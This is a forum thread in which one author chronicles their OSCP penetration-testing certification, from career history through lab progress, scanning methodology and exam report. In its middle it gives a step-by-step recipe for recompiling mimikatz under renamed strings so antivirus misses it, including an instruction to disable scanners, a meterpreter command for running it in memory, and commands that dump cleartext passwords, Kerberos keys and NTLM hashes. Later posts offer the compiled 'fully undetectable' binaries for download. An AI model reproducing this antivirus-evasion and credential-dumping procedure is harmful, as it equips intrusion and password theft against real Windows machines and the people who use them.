The above might make me sound old but I’m only 38 (I guess that statement is relative) and have worked with computers my whole life. When I was 20 I was poached by a large corporation to work on IBM Mainframes. This was in the late 1990’s and it was a time of plenty, back then companies would hire anyone to work on computers due to a global shortage of IT staff. I started off in “Tape Setup” department which was a large library of magnetic DLT tapes, and we would be working in shifts 24-hour around the clock, watching 3 screens with “batch job requests”, essentially tape ID numbers, and run to the correct tape readers to insert these tapes. I have fond memories of Tape Setup. The Tape Setup also served as a prospective pool of future Mainframe operators, and after a few weeks there was an opening as a Mainframe operator in the systems team. I applied and was hired. I worked with mainframes in shifts for around a year and was poached internally by a visionary manager who had just started the “Windows NT department”. Our mainframe computer terminals were being replaced by NT workstations at a very fast pace and their department couldn’t keep up. I got a job as an NT server administrator. They gave me an MCSE NT 4.0 course and I certified. Shortly after, I was among the first people in the world to certify for Windows 2000 (The only reason I know this is because I received a signed “early achiever” reward from Bill Gates). My manager allowed me to study almost non-stop as long as I kept the servers running. I was responsible for about 70 Windows NT servers, and they all ran like clockwork, so I had plenty of time to study.

(Shortening the story a bit here) After a few years in the Windows server department, I realized that my days as a server administrator would soon be coming to an end as more and more of our systems support was being outsourced to India. As Darwin once said, “It is not the strongest species that survives, but the most adaptable”. So I got Cisco certifications and applied for a job in networks support, which I did for a few years. When networking started to get off-shored and outsourced, and with the rise of “the cloud” which virtualizes most of the networking equipment I was supporting, I got into security. Security came naturally to me as most of my setups would take it into account, and having a broad basis of systems knowledge and networks really helped ease the learning curve. I got CISSP certified, did some contracting and freelancing and have settled in an information security job in Brisbane for about a year now. I’m enjoying security and believe this will be my last career switch, having switched twice within the IT field.

Over the years I have gotten quite a few certifications, partly thanks to employers who saw the benefit in training their staff but mostly because I self-study at home almost every day - I enjoy it and I crave it. My list of certifications includes CCNP, CCDP, CCVP, MCSE, MCDBA, CISSP (the list is quite extensive but those would be my preferred ones; the ones I learnt most from or have gotten most value out of during my career). Every 2 years I get another Cisco certification simply to keep my certs active, the Windows certifications don’t expire and I need 40 CPE points per year for my CISSP accreditation. Unfortunately the value of these certifications has dropped significantly with the up-rise of brain-dumping sites. And that is why I’m doing OSCP now! It’s hands-on. No cheating and no brain-dumping: This is a journey that people take alone. This is the “Camino de la Sabatera” of the IT certifications: I will value this certificate more than any of the ones I have gotten so far (except perhaps my early achievers award from Bill Gates!). I have learnt so much already even before starting the course.

Overall I would rate my knowledge coming into the OSCP studies as follows:

  • Networks = excellent
  • Microsoft = excellent
  • Linux = moderate
  • Coding = moderate
  • Scripting = moderate
  • Security (theory) = moderate
  • Security (practical) = moderate
  • Assembly = low
  • Python = zero
  • Linux Kali = zero
  • Metasploit = zero

I will list the resources I used to get up to speed in a separate reply. I’m on 904 pages of notes so far in KeepNote so I will just get the most important links that I used.

EDIT: I posted the links, but I guess the sheer volume of URLs resulted in the post being marked for review by a moderator. If it doesn’t get approved - which due to the hackish nature of some of the links is completely understandable - then I will post a pastebin link instead.

As requested, here is a non-exhaustive list of resources I have used so far. Please keep in mind that some of these links have hundreds or thousands of links in them, most of which I would have read. A good resource to start out is the very first link on this website, which has hundreds of interesting links.

Be warned: This rabbit hole goes deep.

Interesting reading:

Exploit and vulnerability databases:

Restricted shell escape:

Privilege Escalation:


Boot to root websites:

Pentesting blogs:

Reconnaissance websites:

Shell codes:

Tools to hide Shells:


Exploit Development:

Password leaks/lists:

OSCP reviews:

Hash cracking:

Bob was a great experience, one thing was bugging me though: When I ran mimikatz “it didn’t work”. No output, nothing. The command ran then exited without errors. I now know that the desktop must have been full of error dialogs, let’s hope Bob wasn’t using his computer when I did.

I had compiled mimikatz from source, and I wondered if that might have broken something. So I fired up a Windows XP SP0 machine and tried the pre-compiled mimikatz version from the inter-webs. Sure thing, the program worked flawlessly. I then ran my compiled version - which I thought should be identical - and when executing mimikatz I got an error screen on the desktop stating a “DecodePointer” function in Kernel32.dll couldn’t be found. I did some research on this error and learnt that the DecodePointer function was only added to kernel32.dll after Windows SP2: Mystery solved! I added the DecodePointer function to the solution, built it, fired up mimikatz on my Windows XP SP0 machine it worked.

A minor inconvenience was that my antivirus would pick up Mimikatz as malware and delete the file. I proceeded to change the mimikatz code very slightly and I’ve come up with a version that my antivirus doesn’t detect (yet) as a virus. I’ve attached the complete procedure below in case someone wants to compile Mimikatz from source and runs into the same issue:

Author: JollyFrogs, Brisbane NOTE: Disable all virus-scanners before you start downloading, keep them disabled until your files are compiled

Get the required programs and files:

Install Driver Development Toolkit:

Extract GRMWDK_EN_7600_1.ISO with 7-zip

Run KitSetup.exe

  • Click Yes to start the installation
  • Tick “Full Development Environment” and leave all other options unticked
  • Click “OK” in the bottom right
  • Install path: C:\WinDDK\7600.16385.1\
  • Click “OK” in the bottom right
  • Tick “I Agree” in the bottom left and click “OK”

NOTE: The installation commences

  • Click “Finish” in the “Microsoft WDK Install Progress” screen

Install Visual Studio 2013 Community Edition:

Extract vs2013.4_ce_enu.iso with 7-zip

Run vs_community.exe

  • Click “Continue” if you get a setup warning
  • Install path: C:\Program Files (x86)\Microsoft Visual Studio 12.0\
  • Tick “I agree to the License Terms and Privacy Policy.”
  • Untick “Join the Visual Studio Experience Improvement Program”
  • Click “Next”
  • Tick and then untick “Select All” to select nothing
  • Click “INSTALL”
  • Click “Yes” to close the UAC warning screen

NOTE: the installation commences

  • Click “LAUNCH” after install completes
  • Click “Not now, maybe later.” in the Welcome screen
  • Select “General” and Select “Blue” and Click “Start Visual Studio”

Prevent AV detection on Mimikatz:

Extract mimikatz-master.zip to C:\jollykatz\ (you should end up with C:\jollykatz\mimikatz-master\mimikatz.sln” and a whole bunch of files/folders)

run the following in a cmd.exe to rename all files and folders to from “mimi” to “jolly”:

powershell.exe -noprofile -command "1..10 | % {Get-ChildItem c:\\jollykatz\\ -Filter \\"*mimi*\\" -Recurse | Rename-Item -NewName {$_.name -replace 'mimi','jolly' }}"

powershell.exe -noprofile -command "1..10 | % {Get-ChildItem c:\\jollykatz\\ -Filter \\"*kuhl*\\" -Recurse | Rename-Item -NewName {$_.name -replace 'kuhl','frog' }}"

run fnr.exe with following settings:
Dir: C:\\jollykatz\\
Tick "Include sub-directories
File Mask: *.*
Find: mimi
replace: jolly
Click "replace"
run fnr.exe with following settings:
Dir: C:\\jollykatz\\
Tick "Include sub-directories
File Mask: *.*
Find: kuhl
replace: frog
Click "replace"
run fnr.exe with following settings:
Dir: C:\\jollykatz\\
Tick "Include sub-directories
File Mask: *.*
Find: eo.oe.kiwi ![](http://cdn.techexams.net/images/smilies/icon_smile.gif "Smile")
replace: THINC.local
Click "replace"
Close fnr.exe

Copy "EncodePointer.lib" to C:\\jollykatz\\jollykatz-master\\lib\\Win32
Copy "EncodePointer.lib" to C:\\jollykatz\\jollykatz-master\\lib\\x64
NOTE: We're adding "EncodePointer.lib" because WinXP SP0/SP1 would error out with a DecodePointer error caused by compiling with VS2013

Now we’ll build “Jollykatz”:

  • Double-click on “C:\jollykatz\jollykatz-master\jollykatz.sln”

NOTE: Visual Studio Community Edition opens your project

  • In the “Solution Explorer” window on the right, expand “global files” -> “lib” -> right-click on “Win32” and select “Add” -> “Existing Item”
  • Choose “C:\jollykatz\jollykatz-master\lib\Win32\EncodePointer.lib”
  • In the “Solution Explorer” window on the right, expand “global files” -> “lib” -> right-click on “x64” and select “Add” -> “Existing Item”
  • Choose “C:\jollykatz\jollykatz-master\lib\x64\EncodePointer.lib”

  • In the “Solution Explorer” window on the right, right-click on “jollykatz” (might have to scroll to bottom) and select “Properties”
  • Expand “Configuration Properties” -> “General” -> Set “Use of MFC” to “Use Standard Windows Libraries”
  • Click “Apply” in the bottom
  • Expand “Configuration Properties” -> “C/C++” -> “Code Generation” -> Set “Runtime Library” to “Multi-threaded (/MT)”
  • Click “Apply” in the bottom
  • Expand “Configuration Properties” -> “Linker” -> “Input” -> Add “EncodePointer.lib;” at the start of “Additional Dependencies” (in front of “advapi32.lib”)
  • Click “OK” in the bottom

  • In the top menu bar, click “Build” -> “Rebuild Solution”

NOTE: You should see “Rebuild All: 3 succeeded, 0 failed, 0 up-to-date, 0 skipped”

NOTE: This means that the 32-bit build succeeded!

  • In the top bar, next to “Release”, change “Win32” to “x64”
  • In the top menu bar, click “Build” -> “Rebuild Solution”

NOTE: You should see “Rebuild All: 3 succeeded, 0 failed, 0 up-to-date, 0 skipped”

NOTE: This means that the 64-bit build succeeded!

NOTE: You should now see 5 files in the C:\jollykatz\jollykatz-master\Win32\ directory, of which you will need 3:

  • jollykatz.exe
  • jollylib.dll
  • jollydrv.sys

NOTE: You should see the same file structure in the C:\jollykatz\jollykatz-master\x64\ directory

Copy and rename C:\jollykatz\jollykatz-master\Win32\jollykatz.exe to C:\jollykatz\jollykatz32.exe

Copy and rename C:\jollykatz\jollykatz-master\x64\jollykatz.exe to C:\jollykatz\jollykatz64.exe

NOTE: Typically, you only need jollykatz.exe, the driver (jollydrv.sys) and library (jollylib.dll) files are optional. If you need the drivers, copy and rename them as well.

NOTE: Hopefully, your antivirus won’t pick up on the new jollykatz.exe files. If it does, you’ll need to modify some code. Or use the Veil framework.

Run Mimikatz from memory through meterpreter (advisable):

execute -H -i -c -m -d calc.exe -f jollykatz.exe -a '"privilege::debug" "sekurlsa::logonPasswords full" "exit"'

How to use:

-- dump clear-text passwords from LSASS process:
C:\\> jollykatz32.exe "privilege::debug" "sekurlsa::logonPasswords full" "exit"

-- Steal users credentials until they reset their passwords:
C:\\> jollykatz32.exe "privilege::debug" "sekurlsa::ekeys" "exit"

-- Dump LM and NTLM hashes from SAM:
C:\\> jollykatz32.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"

-- read SAM file from /repair or ntbackup files:
C:\\> reg save HKLM\\SYSTEM SystemBkup.hiv
C:\\> reg save HKLM\\SAM SamBkup.hiv
(Or use Volume Shadow Copy / BootCD to backup these files or get them from the repair folder![](http://cdn.techexams.net/images/smilies/icon_smile.gif "Smile")
C:\\> jollykatz32.exe "lsadump::sam SystemBkup.hiv SamBkup.hiv" "exit"

My lab access starts upcoming Sunday at 10:00 AM Brisbane time, in two days! I feel excited like I was as a kid a few nights before Christmas. The sneak peak during the VPN test confirmed my methodology works for at least one host, and this has provided me with confidence to build on my initial methodology.

Over the last few days I’ve mostly been working on windows scripts targeting looting and privilege escalation. I haven’t put any preparation time in Linux, databases or web applications, so I’ll have to get up to speed during lab time. It is my intention to share the scripts I create during my OSCP lab adventures once I confirm they work in the labs.

“How do I ensure that I don’t spoil any of the fun for other OSCP students while still sharing my experience in a meaningful and interesting way?”. This is a question that I haven’t been able to answer yet, but as I move forward into the labs, I am sure I’ll find a good balance between providing useful information and spoiling.

Just a quick write up that I’ve started, the email was received at exactly 10:00 AM this morning, so it must be an automatically scheduled tool that sends the email, no complaints here I was happy to see the email. Username and password to connect via OpenVPN are the same as during the connection test, so if people don’t get the email at the right time (due to spam filters, or not being able to access their email account for some reason) then they can probably just login with the same details they used to test the connection. IP hasn’t changed either, I still have the same dynamic IP I got when I tested, so that saves me time recompiling some of my scripts.

I took down Alice today. And I reset Bob and had another go at him since I forgot to get the “proof.txt” files. I took down Bob2 as well but that’s not really saying much as they are copies. ( there are copies of “popular” machines so you can use either the main one of the secondary, very nice of offset). The proof.txt key is different though, so since I was going for 100% of the labs, I’ll need to get all the machines AND their secondaries.

Resetting hosts is a matter of 10 seconds and the image has been reset. This is needed for computers that rely on “risky” exploits like… well when I crashed Alice. You get 8 resets per day, so use them at will.

Total hosts down so far: 3

What a rush, I just rooted my first Linux machine! I got stuck on a very difficult one, and while running some time-intensive scans on it, I decided to scan another host, BOOM rooted it, and my other scan isn’t even completed yet! Granted it was an easy exploit but it still feels good!

Total hosts rooted so far: 6

Turns out the machine that had me stumped for the last few days was ghost. Ghost is Bobs (much) sneakier brother and it took me a while to figure out the puzzle. I spend approx 2-3 hours after work on the labs. I keep notes of everything I try, and at 20:30 sharp I call it a day. I could go on the whole night of course, but the long term strategy is to not lose sleep over it. After all, this is brain-work and sleep is essential to keep my head in the game.

After popping around 7 boxes total, I decided to change my tactics. I had gathered about 15 full credentials, 25 userIDs and 20 passwords in total and I needed to learn Hydra, Medusa, NCrack and all the other brute-force goodies in the software. So how did it go? Well… to be honest, not very successful. I did learn a great amount of things though: Don’t run brute-force tools over VPN. The VPN totally kills the speed (Hydra will do about 800 tries per minute on a webserver for instance). Instead, it’s much better to use the dedicated Windows machine you get in the labs to run a Windows version of Hydra on and let it run in the background while you do other things.

That said, I have not (yet) been able to find a single password. I know my commands work because if I add a password (that I found via other means) to the list, it finds the password. Brute-forcing is slow, prone to being detected and blocked, locks out accounts permanently with ease, and my main lesson from all this is that it should be used as a method of last resort and not an easy win as I hoped it would be. Strangely, brute-forcing is not nearly as rewarding as to crack a puzzle with brain power. Not to say it can’t be effective, but I won’t be relying on it as much as I had initially planned to.

And now, a bit of fun: “JollyFrogs’ Pwn Difficulty Rating”:

  • 1 = Obvious misconfiguration that leads to compromise without skill or scripting (empty pass/post-its with passwords)
  • 2 = All above + Use of precompiled public exploits without modification or compilation (ie: Script kiddies, Metasploit module)
  • 3 = All above + Use of modified exploits which lead to root access (msfvenom)
  • 4 = All above + Use of fuzzing and password/hash cracking which lead to root access
  • 5 = All above + exploits only lead to low privileged account and requires root privilege escalation
  • 6 = All above + protection evasion (AV/IPS/ASLR/DEP), write or disassemble simple code
  • 7 = All above + chaining advanced exploits, network pivoting, vlan hopping, arp poisoning, or MITM
  • 8 = All above + disassembly, debugging and reverse engineering complex and/or protected code
  • 9 = All above + Requires creation of new 0day exploit, a new hacking or cracking methodology and expert knowledge in the targetted application
  • 10 = Hack the Matrix

Jollyfrogs 1 - Ghost 0 Total hosts down so far: 9

Had to do overtime yesterday on an important project so didn’t get to do any puzzling. I’ve got the whole day today to puzzle, and I’m going to spend the next few hours with Phoenix. I’m learning lots, mostly from google at this point as I’m stuck on the system while trying to escalate privileges. I know “the trick” to escalate, but stringing all the bits and pieces together is proving very time consuming indeed.

Every time I’m getting closer, I realize that the goal was much further away than I originally though. The word “mirage” would have been an appropriate word for the experience I’m going through now. I now realize that what I thought was the hard part (getting a limited shell) now seems to have been the easy part. All good fun though, I’m thoroughly enjoying finding the key and will let you know when I found it

Edit: Thanks Phoenix, you taught me a few valuable lessons! Jollyfrogs 1 - Phoenix 0

Total hosts down: 12

This is my second week of lab access and I’m thoroughly enjoying the labs. So many hosts, so much to do, puzzles everywhere! I’ve been on a roll lately, having fine-tuned my approach. During the week I don’t have much time and if I can put in 2 hours it’s a lot. During weekends I spend about 10 hours per day. I find my original methodology still works, it’s sound and makes sense. I have refined it somewhat and will post all my experiences in the labs as I’m keeping notes. I’ve written around 2000 pages of notes so far! I find that making screenshots isn’t as handy as just copy/pasting the actual exploit although I believe OffSec wants at least one screenshot per host.

I’ve made a “quick admin access” doc where I can quickly RDP to the hosts or SSH to the hosts using admin passwords that I have recovered. I found that I have used the file more than I expected, going back and forth between hosts. For instance, recently I required a MySQL database, so I fired one up on one of the hosts I had root access on. Haven’t touched Humble/Sufferance or Pain yet, as I’m still plucking the low hanging fruit.

24 hosts down 1 secret network

Well, it’s the third week in my labs.. and these boxes are definitely getting harder. Currently stuck on Bethany, she’s proving to be a real tease!

Status: Total hosts down: 28 Networks unlocked: 2

Hi Guys,

Absolutely still on track and Bethany just fell. So far Bethany was the hardest of all machines I’ve tried, followed by Gh0st, and then Pedro. Pedro mainly because I got stuck in a loop of confusion. I can’t give out any details obviously other than that I should have been more patient with Pedro, and it would have been an easy machine.

I’m now running into machines that have dependencies on other machines, and I never bothered to run netstat -ano commands, so I will have to go back to ALL the machines and netstat and tcpdump to see who “talks” with who. Not today though, I’m finding out how to use proxychains, very interesting stuff (I resorted to reading the PDF because proxychains was well beyond my knowledge area and can be really confusing to use). I am now running my very first network scan via proxychains, so far so good!

Don’t worry boys, I’m keeping track of all the resources and when I have time, I will sort out the spoilers from the useful stuff and post all the useful stuff in this thread. I’m installing additional tools and programs on my Kali machine almost daily, and keeping a record of the full installation manual which I’ll share when I get the idea I have all the tools I need

Bethany 0 - Jollyfrogs 1

Just a quick heads up that I’m still on the OSCP trail. Have had 2 weeks off due to work related developments and busy projects, but I’m back in the OSCP mindset now. I find that it’s hard to spend 2 hours per day during the week, the time to “get in” to a system takes about 1 hour, then to “wind down” it takes another 15 minutes so realistically I only get 45 minutes out of it. I’ve decided to spend more time on weekends (12 hours each day) and less during the week so I am rested during weekends. This seems to have worked for me so far (on average during a weekend I will solve 10 easy machines or 1 hard one).

Met a nice guy on irc.osswg.com #OSCP channel called Mokaz. It really helps to motivate each other to get further and tackle the harder machines. Someone on the IRC channel gave a hint (not a solution, but a very generalistic hint as in “you might need to compile more than a single sploit to beat this one” kind of thing, which completely put us on the wrong track for one of the machines.. Perhaps there are more than a single way to tackle a machine.

I’ve updated my installation document again which I believe is now ready for distribution. You can find it here: Jollyfrogs OSCP installation guide 1.03 - Pastebin.com

Pain 0 - Jollyfrogs 1

I had a good day today, pwned 5 boxes. I was getting stuck in boxes that simply wouldn’t bulge, and decided to go back to some older boxes I had gotten a while back when I started. I noticed some machines were talking to eachother, and I was able to utilize this to unstuck myself. I have a few boxes left in the public network and starting to think I might have to move on to the two other networks soon. I still have a few boxes to check for dependencies, after which I’ll move on. I’ve started writing a bash script to automate some privesc tasks.

It’s been quite a while since I posted and the main reason for that is that I have been very busy in the labs. I can now proudly say that my first personal goal has been achieved: I have broken into all of the lab machines! Humble, Sufferance, Jack, Cory, Bethany: All of them have fallen!

When I started, I honestly didn’t know if 90 days would be enough. Around the 20-25 machines mark I started getting stuck. It took me a while to figure out the relationships between the machines, and I had to go back to each machine and run netstat -antp ( -ano ) to get most of the relationships. Cory was elusive but with a hint from a IRC member I was able to find the clue that would lead to Cory’s downfall. I never made that Visio diagram because my notes were accurate enough for me to understand the relationships in the labs. During the course I have never had a single moment where I regretted taking notes in the way that I did. I was able to quickly find the information I needed at any time, despite the fact that KeepNote does not have a (useful) search function.

I met some friendly people on the IRC channel, some of whom I worked together with on some of the harder machines like Sufferance and Humble. This saved a lot of time. I could run one particular scan or try a particular method on a machine, and my partner in crime would run another. We never gave anything away, and the hints were cryptic at best. The hints in the IRC channel are mostly completely useless although some hints help. To hear that Bob is laughing at you won’t really help in cracking him. I further learnt that Bob2 is laughing at me, 2.

So now that I’ve done all the machines, I have to say that none of them were particularly hard. The difficulty was in finding the correct exploit. Most of the exploits I used worked out of the box or required very minimal changes like changing a port number.

Some further advice is to revert the machines before you try your exploit. Some exploits will only work once. It’s easy to forget to do this after having a chain of 5 machines and then running into this one single machine where an exploit “should work” but doesn’t. It’s easy to miss a port in your scans if the service crashed after another student exploited it. Sometimes a password won’t work because a student reset it. The lesson is to revert your machine before you start. If you need extra reverts, just ask an admin in the IRC channel, they will give you 8 extra reverts per day (for a total of 16). I used all my remaining reverts before the next cycle so I never let any revert to go waste. Even if you revert a machine and simply run a port scanner in the background and nothing else, it will be worth it. I would only attack machines that I had scanned after a clean scan. I figured I wouldn’t do more than 8 machines a day anyway, so this matched quite well. And when I needed more reverts I would ask an admin to give me additional reverts. The admins are quite helpful contrary to what is being said on forums. I have yet to hear anyone say “Try Harder” in the IRC channel. In fact, most of the time the IRC channel is quiet because people are busy in the labs. You can keep track of which machines people are working on by keeping track of the ! commands. For instance, if you see someone type !bob then you can be fairly certain that this person is working on Bob. This is how I found people working on !humble and !sufferance. I’d then start a private conversation with them and ask if they were working on that particular machine and if they wanted to work together on it. I haven’t been declined assistance on a machine during my lab course and some people will freely give tips when required. I gave quite a few tips myself to others in the forums. If you see someone struggling on Bob for more than a week you tend to want to give them a hand. Not give it away mind you, but at least tell them if they are looking in the right direction.

I now plan to re-do at least half of the machines which I did the “easy way” the hard way. Some (most?) machines have an easy hack and an additional difficult way in. I’ve done most machines the “easy way” and now plan on doing them the hard way.

So how many times did I use brute-force? Once… and it was a big waste of time. You can do each and every machine without brute-forcing. I did use hashkiller.co.uk a lot though, and used default user credentials on some systems (hardly a brute force). There was a single machine that could be considered a brute-force but wasn’t really (I can’t give more details sorry!). After having gotten some of the passwords I do believe that brute-force MIGHT be a viable approach for some machines, but it is not required.

I’ll post more about my documentation methodology, approach to hacking the boxes, and my upcoming exam soon!

Edit: new v108 guide is out!

Hi ada

I think that the minimum experience levels are:

  • Linux: Medium knowledge, comfortable with the command line. Some things you’ll need to know the following commands and what they do:

    netstat, ifconfig, chown, chmod, cat, simple bash scripts, the difference between a pty limited shell and a full interactive shell, gcc and how to compile simple programs on linux, grep, tcpdump. what is the passwd file and what is the shadow file and how do they relate. How do you add a new user with root privileges on linux via command line? One thing you can do is replace your windows desktop with Ubuntu and you’ll get the hang of it in no time. (Ubuntu because it’s debian based, which is the same as Kali). Or you can run Kali as your workstation. See installation guide above.

  • Windows: Medium knowledge. Know the various ports and what they do. For instance, if you see scan in nmap with 3389 open you can be fairly sure it’s a Windows machine since that port is RDP. Know what services are installed by default. Know how to write simple powershell scripts (one-liners). Know the difference between an elevated command prompt and a non-elevated one. Some commands you will need ot know: ipconfig, netstat, cmd, find, sc, vss. How do you add a new administrator user via the command line?
  • networking: Low knowledge: know what an ip address is, how various protocols work like ping, how firewalls can block traffic (in general), the difference between refused/blocked/timedout packets. know how to read a basic tcp handshake session in wireshark.
  • coding/scripting: Low knowledge: although Ruby/Python experience is not required in my opinion, it will help with the course. Generic programming knowledge however will be needed. You should be familiar with coding and using variables, using command line arguments, replacing small bits of code. Check out exploit 643 on exploit-db: you should be able to understand what’s going on. If you can’t understand what that code does, you’ll need to brush up on your coding. Please note that that piece of code is quite complex and most exploits written in python are easier to understand. What does the shellcode portion do? What do memset, strcat and malloc do? What kind of packet would it send, what would it look like? If you can’t answer those questions, you’ll probably need to brush up your coding.

I don’t think anything else is required and you will pick up things as you go during the course. Even if you don’t fully understand the code, you can start the course and you will learn doing the course. I had never run a Python script or Kali before starting the course, although I did have some Linux experience (CentOS and Ubuntu) and general coding experience (C++)

[Quote] Originally Posted by MrAgent ![View Post]

Will you be taking the exam anytime soon JollyFrogs?

I’m planning to schedule the exam sometime in September. I’m still going through the lab notes and re-doing some of the machines in another way, and I still need to prepare my report so that it is ready (as much as possible) for the exam.

[Quote] Originally Posted by dookdook ![View Post]

JollyFrogs! Well done man, all the boxes. Thats impressive I start on Sunday in the labs, and just getting my VM ready, so following your latest guide. So no issues at all using Kali 2.0 with the course then?

Hi Dook,

I released a v108 guide that fixes an annoying slow shutdown issue in v107. This will be the last installation guide for a while, it seems this v108 is very stable (I redid a clean install using it, no issues).

JollyFrogs OSCP PWK Kali 2.0 installation guide v108 - Pastebin.com

Yes, you can use that install in the labs, I had no issues on any machines with this setup.

Yesterday, I concluded my OSCP adventure! Although I haven’t received official confirmation yet, I was able to pwn all the machines in the labs. And with that, achieve my personal goal that I made many months ago before even signing up to the course: Owning 100% of the lab machines and passing the exam with a 100% score. I’m really pleased with this result. I learned plenty during this exam, I dare say more than any other exam I have completed (and there are quite a few!).

I really looked forward to the exam. The chance to have a go at an extra 5 machines was an exciting prospective. The labs prepared me well for the experience and I wasn’t fearful or worried and I had a really good sleep before the exam. My exam was booked for 07:00 AM and my partner worked from home to provide mental support. I had set up an auto-forwarder on my Outlook at work to forward the exam email, this didn’t work for some reasons and I had to VPN into work and pick up the email manually. I manually forwarded the email to my gmail account and logged off work VPN. I used the Kali v108 machine, the installation guide of which you can find in one of my earlier posts. I have been able to do all lab machines, all exercises and the exam with this machine and the new Kali is a pleasure to work with after some minor UI tweaks (which are in the v108 guide as well).

The exam guide is a short PDF document which clearly explains the objectives of the exam. I was allocated a small number of machines to attack. The PDF explains in detail what is allowed and what isn’t allowed in the exam. In general, the use of automated tools is not allowed, however it is allowed to use msfvenom. I personally didn’t use the meterpreter at all during the exam, but you are allowed to use SOME functionality of the meterpreter. Don’t get too used to using meterpreter in the labs, and instead try and use the reverse tcp shells of msfvenom instead. Some of the allocated machines are worth more points than others, and you need to get a certain number of points to pass the exam. Offsec advises to fill in the lab report but I chose not to do this as it is not required. The only required deliverables are the actual exam report, for which Offsec will give you a Microsoft Word or OpenOffice template. The template is very well thought out and I recommend using it.

Scanning the machines took a fair bit of time. To the point I was getting a bit anxious about the duration of the scans. I chose to run top 1000 port scans on two of the machines, and the full 1-65535 on the other machines. This worked out well as I could work on the two machines while my other scans ran in the background. The first machine fell within 2 hours. Another fell 2 hours later. After 10 hours of being in the exam, all machines had fallen.

I stuck to my well reversed approach that I perfected in the labs and it paid off.

The approach I used in the labs and in the exam was as follows:

  1. Revert the machine you are about to attack (not required in the exam)
  2. Run single machine port scans on the machines you are attacking:
  • Single host TCP scan:
nmap -Pn -sS --stats-every 3m --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit -T4 -p1-65535 -oA /root/192_168_15_201T
  • Single host UDP scan:
nmap -Pn --top-ports 1000 -sU --stats-every 3m --max-retries 1 -T3 -oA /root/192_168_15_201U
  • Detailed single host TCP scan:
nmap -nvv -Pn -sSV -T1 -p$(cat 192_168_15_201T.xml | grep portid | grep protocol=\\"tcp\\" | cut -d'"' -f4 | paste -sd "," -) --version-intensity 9 -A -oA /root/192_168_15_201T_DETAILED
  1. Analyze the port scan results. Some ports might stand out (you will learn in the labs which ports stand out and why).
  2. Detailed port attacks. You will learn in the labs which work best for you.
  • nikto and dirb for webservers
  • nmap smb-check-vulns script and enum4linux for samba and CIFS services
  • etc
  1. Kali “searchsploit” with the service/software version of each port.
  2. Exploit the vulnerability you found with searchsploit to gain a limited or root shell
  3. If limited shell then use the linux or windows exploit suggesters, “searchsploit kernel x.x” and search for common weaknesses in the software.

I have used a lot of websites during my OSCP to gain experience, but there are some websites that stand out in this respect and which I came back to time and time again: hashkiller, rebootuser pages 1758 and 1721 for linux, and fuzzysecurity tutorial 16 for windows.

After having owned all machines in the exam, I went through the documentation and updated as much as I could. After I had updated the documentation in KeepNote, I reverted the machines and used the notes step-by-step to own the clean machines again. I learnt to do this in the labs, and one might be surprised how poor one’s notes can be when doing this. I always find issues with the notes after doing clean machines. If I find lots of discrepancies, I will revert the machine again, and redo them a last time, until every command in the notes matches with results in the real exam. This way, I keep my notes accurate and to the point. I copy/paste the text from the terminal into my notes. I only take a single screenshot of the machine, which I do at the very end of taking notes. This keeps notes clean and to the point, it also keeps my notes reusable because I can copy/paste commands. I have frequently re-used portions of an exploit on one machine onto another in this manner.

The screenshot has the following information, taken from a shell with root/system privileges: proofs - Pastebin.com

echo " ";echo "uname -a:";uname -a;echo " ";echo "hostname:";hostname;echo " ";echo "id";id;echo " ";echo "ifconfig:";/sbin/ifconfig -a;echo " ";echo "proof:";cat /root/proof.txt 2>/dev/null; cat /Desktop/proof.txt 2>/dev/null;echo " "

echo. & echo. & echo whoami: & whoami 2> nul & echo %username% 2> nul & echo. & echo Hostname: & hostname & echo. & ipconfig /all & echo. & echo proof.txt: & type "C:\Users\Administrator\Desktop\proof.txt" 2> nul & type "C:\Documents and Settings\Administrator\Desktop\proof.txt" 2> nul & type %USERPROFILE%\Desktop\proof.txt 2> nul

I have read about people writing 300+ page exam reports, but I wanted to keep the report realistic and uncluttered. My final report was just 28 pages, which included a table in an annex which listed each of the lab machines IP address, proof.txt value and a short (10 word or less) description of how access was performed.

The exam report took about 5 hours to write. I reviewed the report at least 3 times before email to the email address in the exam notes. I’m pretty confident I passed, having done 100% of the lab machines and 100% of the exam machines. I’ll have to wait for the email confirmation to be sure though!

Thanks guys! Got my email today, I passed! I’ll do some sorting of my notes over the next few days and will post tools and helpers I used.

I’ve sorted out the scripts from the spoilers and there are two scripts left. All other scripts somehow relate to machines or vulns that would prove too much of a spoiler.

My rootloot.bat script for windows: [Winbatch] Jollyfrogs-batch - Pastebin.com

Jollykatz: it’s simply a recompiled mimikatz with some changed parameters that makes it undetected to most AV. Usual T&C’s apply, use with care. http://www.filedropper.com/jollykatz

I’m currently undecided on whether to progress to OSCE or CISM. If I decide to go for OSCE I will create a new OSCE thread in this forum.

Hi Kane,

didn’t realize it had a password on it, I usually password protect my files to prevent AV from reading them and deleting them.

The password is “infected”. (the file is not infected, it’s just my standard password for anything OSCP related which could potentially be picked up (now or in future) as malware, so I don’t accidentally copy or use it on production PCs).

Hi Muggie,

I wrote such a script but if you follow the course, you will be able to write one yourself. You will learn more if you write these scripts yourself and once you have written one, and understand how it works (start small, like this script) you can reuse code for other scripts. If you are totally lost on where to start, check out the patator python script as a start, it’s a pretty large script but you can butcher it and tailor to your needs.

[Quote] Originally Posted by Mooseboost ![View Post]

You know, I have not seen Jolly around in some time. I wonder what they moved on to after owning the OSCP?

I’m still around but haven’t had much time due to work commitments. I’m doing SLAE now, in preparation of OSCE. I posted a new post today on my progress with SLAE !

Every once in a while someone emails me, they typically ask if I’m still alive (I am!). After OSCP I’ve been busy with SLAE and OSCE, and I’m currently studying the SecurityTube Forensics course and the SANS course GXPN, as well as doing research on two (red team) topics.

I saw the jollykatz files timed out on the original upload location, and TE doesn’t allow uploading the zip file (probably because it contains .exe files), so I’ve uploaded them to this permanent location. The jollykatz_xp is compiled slightly differently, so if the other version doesn’t work, the XP version might (specifically on Windows XP service pack 0 machines. The zip file has no password, and I’ve just scanned all 4 files with Avast and all files are still FUD.


Please note: jollykatz is just a simple recompilation of the mimikatz tool with the aim to make it FUD. All credit goes to the creator of Mimikatz.